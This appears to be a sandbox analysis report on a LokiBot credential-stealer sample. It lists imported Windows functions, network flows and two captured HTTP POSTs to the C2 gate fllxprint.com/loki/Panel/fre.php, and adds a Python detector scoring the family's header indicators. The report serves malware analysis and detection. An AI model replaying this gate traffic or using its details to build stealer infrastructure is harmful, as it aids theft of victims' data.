0x4a7684 GetActiveWindow
0x4a7688 FrameRect
0x4a768c FindWindowA
0x4a7690 FillRect
0x4a7694 EqualRect
0x4a7698 EnumWindows
0x4a769c EnumThreadWindows
0x4a76a0 EndPaint
0x4a76a4 EnableWindow
0x4a76a8 EnableScrollBar
0x4a76ac EnableMenuItem
0x4a76b0 DrawTextA
0x4a76b4 DrawMenuBar
0x4a76b8 DrawIconEx
0x4a76bc DrawIcon
0x4a76c0 DrawFrameControl
0x4a76c4 DrawEdge
0x4a76c8 DispatchMessageA
0x4a76cc DestroyWindow
0x4a76d0 DestroyMenu
0x4a76d4 DestroyIcon
0x4a76d8 DestroyCursor
0x4a76dc DeleteMenu
0x4a76e0 DefWindowProcA
0x4a76e4 DefMDIChildProcA
0x4a76e8 DefFrameProcA
0x4a76ec CreatePopupMenu
0x4a76f0 CreateMenu
0x4a76f4 CreateIcon
0x4a76f8 ClientToScreen
0x4a76fc CheckMenuItem
0x4a7700 CallWindowProcA
0x4a7704 CallNextHookEx
0x4a7708 BeginPaint
0x4a770c CharNextA
0x4a7710 CharLowerBuffA
0x4a7714 CharLowerA
0x4a7718 CharUpperBuffA
0x4a771c CharToOemBuffA
0x4a7720 CharToOemA
0x4a7724 AdjustWindowRectEx
Library kernel32.dll:
0x4a7730 Sleep
Library oleaut32.dll:
0x4a7738 SafeArrayPtrOfIndex
0x4a773c SafeArrayPutElement
0x4a7740 SafeArrayGetElement
0x4a7748 SafeArrayAccessData
0x4a774c SafeArrayGetUBound
0x4a7750 SafeArrayGetLBound
0x4a7754 SafeArrayCreate
0x4a7758 VariantChangeType
0x4a775c VariantCopyInd
0x4a7760 VariantCopy
0x4a7764 VariantClear
0x4a7768 VariantInit
Library ole32.dll:
0x4a7774 IsAccelerator
0x4a7778 OleDraw
0x4a7780 CoTaskMemFree
0x4a7784 ProgIDFromCLSID
0x4a7788 StringFromCLSID
0x4a778c CoCreateInstance
0x4a7790 CoGetClassObject
0x4a7794 CoUninitialize
0x4a7798 CoInitialize
0x4a779c IsEqualGUID
Library oleaut32.dll:
0x4a77a4 GetErrorInfo
0x4a77a8 GetActiveObject
0x4a77ac SysFreeString
Library comctl32.dll:
0x4a77bc ImageList_Write
0x4a77c0 ImageList_Read
0x4a77d0 ImageList_DragMove
0x4a77d4 ImageList_DragLeave
0x4a77d8 ImageList_DragEnter
0x4a77dc ImageList_EndDrag
0x4a77e0 ImageList_BeginDrag
0x4a77e4 ImageList_Remove
0x4a77e8 ImageList_DrawEx
0x4a77ec ImageList_Draw
0x4a77fc ImageList_Add
0x4a7804 ImageList_Destroy
0x4a7808 ImageList_Create
0x4a780c InitCommonControls

Hosts

No hosts contacted. (This field is empty even though the TCP table below records three connections to fllxprint.com; treat the TCP and HTTP sections as authoritative.)

TCP

Source | Source port | Destination | Destination port
192.168.56.101 | 49180 | 162.255.119.154 (fllxprint.com) | 80
192.168.56.101 | 49182 | 162.255.119.154 (fllxprint.com) | 80
192.168.56.101 | 49183 | 162.255.119.154 (fllxprint.com) | 80

UDP

Source | Source port | Destination | Destination port
192.168.56.101 | 49235 | 114.114.114.114 | 53
192.168.56.101 | 50568 | 114.114.114.114 | 53
192.168.56.101 | 51963 | 114.114.114.114 | 53
192.168.56.101 | 55368 | 114.114.114.114 | 53
192.168.56.101 | 56539 | 114.114.114.114 | 53
192.168.56.101 | 57756 | 114.114.114.114 | 53
192.168.56.101 | 61680 | 114.114.114.114 | 53
192.168.56.101 | 137 | 192.168.56.255 | 137
192.168.56.101 | 138 | 192.168.56.255 | 138
192.168.56.101 | 123 | 20.189.79.72 (time.windows.com) | 123
192.168.56.101 | 50002 | 224.0.0.252 | 5355
192.168.56.101 | 50534 | 224.0.0.252 | 5355
192.168.56.101 | 51378 | 224.0.0.252 | 5355
192.168.56.101 | 51808 | 224.0.0.252 | 5355
192.168.56.101 | 53237 | 224.0.0.252 | 5355
192.168.56.101 | 53380 | 224.0.0.252 | 5355
192.168.56.101 | 56804 | 224.0.0.252 | 5355
192.168.56.101 | 57236 | 224.0.0.252 | 5355
192.168.56.101 | 60123 | 224.0.0.252 | 5355
192.168.56.101 | 60384 | 224.0.0.252 | 5355

All of the UDP traffic is infrastructure noise: the port-53 flows go to 114.114.114.114, a public DNS resolver (the fllxprint.com lookup is among them), 137/138 to the broadcast address is NetBIOS name service, 224.0.0.252:5355 is LLMNR, and port 123 to time.windows.com is NTP.

HTTP & HTTPS Requests

URI and request headers (two POSTs to the same gate; the bodies are binary, 196 and 169 bytes, and are not shown)
http://fllxprint.com/loki/Panel/fre.php
POST /loki/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: fllxprint.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C51FDD8
Content-Length: 196
Connection: close

http://fllxprint.com/loki/Panel/fre.php
POST /loki/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: fllxprint.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C51FDD8
Content-Length: 169
Connection: close
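No Suricata or Snort alert fired on these requests (see the sections that follow), yet the headers alone are enough to identify this family's gate traffic. The following Python is an added example, not code from the report, its vendor or the sample: it parses a raw request head and scores the indicators visible above (the hard-coded User-Agent, the custom Content-Key header, an HTTP/1.0 POST with no Referer, the invalid `Content-Encoding: binary`, an octet-stream POST body and the /fre.php gate path). The captured request is reconstructed from the first POST above with its body omitted; the contrasting benign request, its example.com host and the threshold of three indicators are assumptions made for the example.

```python
"""Flag LokiBot-style HTTP gate traffic from raw request headers.

Added example, not code from the report or the sample. LOKI_REQUEST is
constructed from the first captured POST (headers only); BENIGN_REQUEST
and the threshold are assumptions for contrast.
"""

LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"   # hard-coded by the family

# Constructed from the report's first captured request (headers only).
LOKI_REQUEST = """\
POST /loki/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: fllxprint.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C51FDD8
Content-Length: 196
Connection: close
"""

# Constructed benign browser form post for contrast (assumed, not captured).
BENIGN_REQUEST = """\
POST /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/88.0
Referer: https://example.com/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Connection: keep-alive
"""


def parse_request(raw):
    """Split a raw HTTP request head into method, path, version and lowercased headers."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; values may contain ':'
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def loki_indicators(req):
    """Return the indicators present; each is independent, so the list is the evidence."""
    h = req["headers"]
    is_post = req["method"] == "POST"
    hits = []
    if h.get("user-agent") == LOKI_USER_AGENT:
        hits.append("hard-coded LokiBot User-Agent")
    if "content-key" in h:
        hits.append("custom Content-Key header")
    if is_post and req["version"] == "HTTP/1.0":
        hits.append("POST over HTTP/1.0")
    if is_post and "referer" not in h:
        hits.append("POST without Referer")
    if h.get("content-encoding", "").lower() == "binary":
        hits.append("invalid Content-Encoding: binary")
    if is_post and h.get("content-type") == "application/octet-stream":
        hits.append("opaque octet-stream POST body")
    if req["path"].lower().endswith("/fre.php"):
        hits.append("LokiBot gate path fre.php")
    return hits


def verdict(raw, threshold=3):
    """'lokibot' when at least `threshold` indicators fire, otherwise 'benign'."""
    hits = loki_indicators(parse_request(raw))
    return ("lokibot" if len(hits) >= threshold else "benign"), hits
```

`verdict(LOKI_REQUEST)` returns `lokibot` with all seven indicators; the benign browser post scores none. In practice the User-Agent or the Content-Key header alone justifies an alert; the threshold exists so that a bare HTTP/1.0 POST without a Referer, which some legacy clients still send, does not fire by itself.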

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.